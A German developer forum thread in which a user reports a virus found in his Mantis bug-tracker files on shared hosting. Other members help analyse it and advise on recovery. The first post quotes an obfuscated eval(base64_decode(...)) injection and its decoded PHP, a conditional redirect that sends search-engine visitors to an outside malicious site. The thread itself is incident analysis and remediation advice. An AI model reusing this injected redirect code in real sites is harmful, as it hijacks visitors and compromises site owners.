PHP Virus ?

**haentschman**

Hallöle...

Beim Download der Config Datei meines Mantis wurde ein Virus gefunden...

Hä... Wie jetzt?

In der ersten Zeile einiger (aller?) Dateien war das Muster:

markieren

Code:

eval(base64_decode("DQplcnJvcl9yZXBvcnR...l9DQp9DQp9"));

vorhanden.
Ein Decode ergibt folgenden Code:

Zitat:

<?php error_reporting(0);
$qazplm = headers_sent();
if (!$qazplm) {
$referer = $_SERVER['HTTP_REFERER'];
$uag = $_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag, "MSIE 7.0") and !stristr($uag, "MSIE 6.0")) {
if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "live.com") or stristr($referer, "webalta") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer) or preg_match("/google\.(.*?)\/url\?sa/", $referer) or stristr($referer, "myspace.com") or stristr($referer, "facebook.com/l") or stristr($referer, "aol.com")) {
if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
header("Location: http://ibontu.25u.com/");
exit();
}
}
}
}
}

Was macht der Code genau?

**Daniel**

Er leitet den Anwender um auf eine andere Website.
Irgendwer hatte wohl Schreibzugriff, der dazu nicht hätte befugt sein sollen.

//edit: Brich das bitte mal um.

**haentschman**

Danke Daniel...

Hmm... ich habe die ganze Zeit mit dem Mantis gearbeitet. Wo anders bin ich nie rausgekommen...

Zitat:

Brich das bitte mal um.

Sorry... Beim Speichern hatte sich Avira logischerweise über einen Scriptvirus beschwert. Danach hatte ich das Script eingekürzt. Beim erneuten Speichern hat er dann doch das Ganze übertragen.
...erledigt.

**Daniel**

Er prüft vorher ein paar Bedingungen ab, so z.B. die Kennung des Browsers sowie die verweisende Webseite.
Die Umleitung wird nur aktiv, wenn Du nicht den IE in Version 6 oder 7 nutzt und von einer der o.g. Suchmaschinen kommst.

Der Webserver hat augenscheinlich ein gravierendes Sicherheitsproblem, da es wenigstens einen Weg gab oder immernoch gibt, Dateien zu verändern.

**vagtler**

Der entsprechende Server ist kompromittiert. Wenn Du nicht genau nachvollziehen kannst, was dort wann passiert ist, würde ich den Server vollständig neu aufsetzen. Dabei sollte für alle dort betriebenen Dienste auf Datensicherungen vor dem erfolgreichen Angriff zurückgegriffen werden.

**haentschman**

Das ist der Webspace bei 1und1 welche mir nach dem Hochladen einer verseuchten Datei sofort meinen FTP Zugang zugemacht haben und der Virus erkannt wurde. Erstaunlich das das im laufenden Bertieb nicht aufgefallen ist. Die sind da eigentlich kurz angebunden...

Nachtrag:
Vor Jahren hatte ich mal einen Angriff der auch durchgekommen war und von 1und1 protokolliert wurde. Die von mir manuell kontrollierten Dateien trugen den Code und Änderung März 2013. Kann gut sein das das noch übrig geblieben ist.

So wie es aussieht war nur der Mantis Ordner betroffen. Alles ohne Ausnahme entsorgt und neu instaliert. Nächste Woche mache ich wieder Kontrolle.

**vagtler**

Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.

**borncrush**

Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren.

**haentschman**

Danke an Alle...

Ich denke das sind Reste von dem alten Angriff. Der FTP Log zeigt 2 Monate rückwirkend keinen Zugriff außer von mir selbst.

Zitat:

Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren.

...ich habe den Mantis komplett neu aufgesetzt. Kennwörter sind verschärft.

Zitat:

Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.

Meinst du die von 1und1 haben keine Ahnung?

**vagtler**

Zitat von haentschman:

[...]

Zitat:

Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.

Meinst du die von 1und1 haben keine Ahnung?

Mal abgesehen davon, dass es sich bei den 1&1 Webservern um ein reines Webhosting und kein Managed Server Angebot handelt und daher der Betrieb von geschäftskritischen Applikationen darauf sich eigentlich schon per se verbietet, wollte ich die Kompetenz der 1&1-Mitarbeiter nicht in Frage stellen.

Aber in heutigen Zeiten einen nicht getunnelten FTP-Zugriff ohne weitere Sicherheitsmaßnahmen überhaupt nur anzubieten genügt auch geringsten Sicherheitsanforderungen selbst im privaten Bereich kaum noch - schließlich wird Dein Passwort unverschlüsselt über das Internet übertragen.

PHP Virus ?

PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

AW: PHP Virus ?

Forumregeln

Daniel (Co-Admin) Registriert seit: 30. Mai 2002 Ort: Hamburg 13.920 Beiträge Delphi 10.4 Sydney	#2 AW: PHP Virus ? 3. Jan 2016, 13:02 Er leitet den Anwender um auf eine andere Website. Irgendwer hatte wohl Schreibzugriff, der dazu nicht hätte befugt sein sollen. //edit: Brich das bitte mal um. Daniel R. Wolf mit Grüßen aus Hamburg
	Zitat

haentschman Registriert seit: 24. Okt 2006 Ort: Seifhennersdorf / Sachsen 5.436 Beiträge Delphi 12 Athens	#3 AW: PHP Virus ? 3. Jan 2016, 13:28 Danke Daniel... Hmm... ich habe die ganze Zeit mit dem Mantis gearbeitet. Wo anders bin ich nie rausgekommen... Zitat: Brich das bitte mal um. Sorry... Beim Speichern hatte sich Avira logischerweise über einen Scriptvirus beschwert. Danach hatte ich das Script eingekürzt. Beim erneuten Speichern hat er dann doch das Ganze übertragen. ...erledigt.
	Zitat

vagtler Registriert seit: 9. Jul 2010 Ort: Köln 667 Beiträge Delphi 2010 Professional	#5 AW: PHP Virus ? 3. Jan 2016, 13:41 Der entsprechende Server ist kompromittiert. Wenn Du nicht genau nachvollziehen kannst, was dort wann passiert ist, würde ich den Server vollständig neu aufsetzen. Dabei sollte für alle dort betriebenen Dienste auf Datensicherungen vor dem erfolgreichen Angriff zurückgegriffen werden.
	Zitat

vagtler Registriert seit: 9. Jul 2010 Ort: Köln 667 Beiträge Delphi 2010 Professional	#7 AW: PHP Virus ? 3. Jan 2016, 14:14 Ich würde (zumindest geschäftlich genutzte) Server nur managen lassen wollen von Leuten, die was davon verstehen.
	Zitat

borncrush Registriert seit: 18. Dez 2005 Ort: Berlin 115 Beiträge Delphi XE7 Enterprise	#8 AW: PHP Virus ? 3. Jan 2016, 14:16 Falls Du kein Backup einspielen kannst, denke bitte daran, umgehend alle Kennwörter zu ändern und unnötige Konten zu deaktivieren. Delphi programming
	Zitat